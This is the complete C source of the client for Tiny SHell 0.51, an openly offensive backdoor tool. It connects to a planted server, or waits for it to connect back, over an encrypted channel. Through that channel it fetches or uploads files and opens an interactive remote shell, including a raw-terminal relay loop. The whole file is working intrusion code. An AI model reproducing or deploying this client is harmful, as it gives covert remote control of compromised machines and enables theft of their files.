/*
 * Tiny SHell version 0.51 - client side
 * by Christophe Devine <devine@cr0.net>
 * this program is licensed under the GPL.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <termios.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <netdb.h>

#include "tsh.h"
#include "pel.h"
#include "sha1.h"

/* program entry point */

int main( int argc, char *argv[] )
{
    unsigned char buffer[BUFSIZE];
    int n, server, action;
    char *arg_str;

    struct sockaddr_in server_addr;
    struct termios tp, tr;
    struct winsize ws;

    /* check the arguments */

    arg_str = NULL; action = 0;

    if( argc < 4 || argc > 5 )
    {
    usage:

        printf( "\n" );
        printf( "usage:\n" );
        printf( "\n" );
        printf( "  %s <hostname> get <remote file> <local file>\n", argv[0] );
        printf( "  %s <hostname> put <local file> <remote file>\n", argv[0] );
        printf( "  %s <hostname> run <command>\n", argv[0] );
        printf( "\n" );
        printf( "(use 'cb' as <hostname> to operate in connect-back mode)\n" );
        printf( "\n" );
        printf( "example: %s localhost run \"exec bash --login\"\n", argv[0] );
        printf( "\n" );

        return( 1 );
    }

    if( ! strcmp( argv[2], "get" ) )
    {
        if( argc != 5 ) goto usage;
        action = GET_FILE;
        arg_str = argv[3];
    }

    if( ! strcmp( argv[2], "put" ) )
    {
        if( argc != 5 ) goto usage;
        action = PUT_FILE;
        arg_str = argv[4];
    }

    if( ! strcmp( argv[2], "run" ) )
    {
        if( argc != 4 ) goto usage;
        action = RUNSHELL;
        arg_str = argv[3];
    }

    if( ! action ) goto usage;

    /* create a socket */

    if( ( server = socket( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
        perror( "socket" );
        return( 2 );
    }

    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons( SERVER_PORT );

    if( strcmp( argv[1], "cb" ) )
    {
        struct hostent *server_host;

        /* resolve the server hostname */

        if( ! ( server_host = gethostbyname( argv[1] ) ) )
        {
            fprintf( stderr, "gethostbyname failed\n" );
            return( 3 );
        }

        memcpy( (void *) &server_addr.sin_addr,
                (void *) server_host->h_addr,
                server_host->h_length );

        /* connect to the remote host */

        if( connect( server, (struct sockaddr *) &server_addr,
                     sizeof( server_addr ) ) < 0 )
        {
            perror( "connect" );
            return( 4 );
        }
    }
    else
    {
        int client;
        struct sockaddr client_addr;

        /* bind the client on the port the server will connect to */

        n = 1;

        if( setsockopt( server, SOL_SOCKET, SO_REUSEADDR,
                        (void *) &n, sizeof( n ) ) < 0 )
        {
            perror( "setsockopt" );
            return( 4 );
        }

        server_addr.sin_addr.s_addr = INADDR_ANY;

        if( bind( server, (struct sockaddr *) &server_addr,
                  sizeof( server_addr ) ) < 0 )
        {
            perror( "bind" );
            return( 5 );
        }

        if( listen( server, 5 ) != 0 )
        {
            perror( "listen" );
            return( 6 );
        }

        n = sizeof( client_addr );

        /* wait for the server to connect */

        fprintf( stderr, "waiting for the server to connect\n" );

        if( ( client = accept( server, (struct sockaddr *)
                                &client_addr, &n ) ) < 0 )
        {
            perror( "accept" );
            return( 7 );
        }

        fprintf( stderr, "connected.\n" );

        close( server );
        server = client;
    }

    /* setup the packet encryption layer */

    if( pel_client_init( server, secret ) )
    {
        return( 8 );
    }

    /* send the requested action */

    PUT_UINT32( action, buffer, 0 );

    if( pel_send( server, buffer, 4, 0 ) != 4 )
    {
        perror( "send" );
        return( 9 );
    }

    /* send remote filename or system command */

    n = strlen( arg_str );

    if( n >= BUFSIZE )
    {
        fprintf( stderr, "argument string too long\n" );
        return( 10 );
    }

    PUT_UINT32( n, buffer, 0 );

    if( pel_send( server, buffer, 4, 0 ) != 4 )
    {
        perror( "send" );
        return( 11 );
    }

    strncpy( (char *) buffer, arg_str, BUFSIZE );

    if( pel_send( server, buffer, n, 0 ) != n )
    {
        perror( "send" );
        return( 12 );
    }

    switch( action )
    {
    case GET_FILE:
    {
        int file;
        long long int total = 0;

        /* create local file */

        if( ( file = creat( argv[4], S_IRWXU ) ) < 0 )
        {
            perror( "creat" );
            return( 13 );
        }

        /* transfer from server */

        while( ( n = pel_recv( server, buffer, BUFSIZE, 0 ) ) > 0 )
        {
            if( write( file, buffer, n ) != n )
            {
                perror( "write" );
                return( 14 );
            }

            total += n;
            printf( "%lld\r", total );
            fflush( stdout );
        }

        printf( "\n" );

        if( n < 0 )
        {
            perror( "recv" );
            return( 15 );
        }

        break;
    }

    case PUT_FILE:
    {
        int file;
        long long int total = 0;

        /* open local file */

        if( ( file = open( argv[3], O_RDONLY ) ) < 0 )
        {
            perror( "open" );
            return( 16 );
        }

        /* transfer to server */

        while( ( n = read( file, buffer, BUFSIZE ) ) > 0 )
        {
            if( pel_send( server, buffer, n, 0 ) != n )
            {
                perror( "send" );
                return( 17 );
            }

            total += n;
            printf( "%lld\r", total );
            fflush( stdout );
        }

        printf( "\n" );

        if( n < 0 )
        {
            perror( "read" );
            return( 18 );
        }

        break;
    }

    case RUNSHELL:
    {
        char *term;

        /* get and send the window size */

        if( ioctl( 0, TIOCGWINSZ, &ws ) < 0 )
        {
            perror( "ioctl" );
            return( 19 );
        }

        PUT_UINT32( ws.ws_row,    buffer,  0 );
        PUT_UINT32( ws.ws_col,    buffer,  4 );
        PUT_UINT32( ws.ws_xpixel, buffer,  8 );
        PUT_UINT32( ws.ws_ypixel, buffer, 12 );

        if( pel_send( server, buffer, 16, 0 ) != 16 )
        {
            perror( "send" );
            return( 20 );
        }

        /* get the TERM environment variable */

        buffer[0] = 'T'; buffer[3] = 'M';
        buffer[1] = 'E'; buffer[4] = '\0';
        buffer[2] = 'R';

        if( ! ( term = getenv( (char *) buffer ) ) )
        {
            fprintf( stderr, "TERM variable undefined\n" );
            return( 21 );
        }

        n = strlen( term );

        if( n >= BUFSIZE )
        {
            fprintf( stderr, "TERM variable too long\n" );
            return( 22 );
        }

        /* pass the TERM variable to the server */

        PUT_UINT32( n, buffer, 0 );

        if( pel_send( server, buffer, 4, 0 ) != 4 )
        {
            perror( "send" );
            return( 23 );
        }

        strncpy( (char *) buffer, term, n );

        if( pel_send( server, buffer, n, 0 ) != n )
        {
            perror( "send" );
            return( 24 );
        }

        /* get terminal attributes */

        if( tcgetattr( 0, &tp ) < 0 )
        {
            perror( "tcgetattr" );
            return( 25 );
        }

        /* set the keyboard to RAW */

        bcopy( (void *) &tp, (void *) &tr, sizeof( tr ) );

        tr.c_iflag |= IGNPAR;
        tr.c_iflag &= ~(ISTRIP|INLCR|IGNCR|ICRNL|IXON|IXANY|IXOFF);
        tr.c_lflag &= ~(ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHONL|IEXTEN);
        tr.c_oflag &= ~OPOST;

        tr.c_cc[VMIN]  = 1;
        tr.c_cc[VTIME] = 0;

        if( tcsetattr( 0, TCSADRAIN, &tr ) < 0 )
        {
            perror( "tcsetattr" );
            return( 26 );
        }

        /* let's forward the data back and forth */

        while( 1 )
        {
            fd_set rd;

            FD_ZERO( &rd );
            FD_SET( 0, &rd );
            FD_SET( server, &rd );

            if( select( server + 1, &rd, NULL, NULL, NULL ) < 0 )
            {
                tcsetattr( 0, TCSADRAIN, &tp );
                perror( "select" );
                return( 27 );
            }

            if( FD_ISSET( 0, &rd ) )
            {
                if( ( n = read( 0, buffer, BUFSIZE ) ) < 0 )
                {
                    tcsetattr( 0, TCSADRAIN, &tp );
                    perror( "read" );
                    return( 28 );
                }
                if( n == 0 )
                {
                    tcsetattr( 0, TCSADRAIN, &tp );
                    /* reached EOF on stdin */
                    return( 29 );
                }
                if( pel_send( server, buffer, n, 0 ) != n )
                {
                    tcsetattr( 0, TCSADRAIN, &tp );
                    perror( "send" );
                    return( 30 );
                }
            }

            if( FD_ISSET( server, &rd ) )
            {
                if( ( n = pel_recv( server, buffer, BUFSIZE, 0 ) ) < 0 )
                {
                    tcsetattr( 0, TCSADRAIN, &tp );
                    perror( "recv" );
                    return( 31 );
                }
                if( n == 0 )
                {
                    tcsetattr( 0, TCSADRAIN, &tp );
                    /* connection closed */
                    break;
                }
                if( write( 1, buffer, n ) != n )
                {
                    tcsetattr( 0, TCSADRAIN, &tp );
                    perror( "write" );
                    return( 32 );
                }
            }
        }
    }
    }

    return( 0 );
}
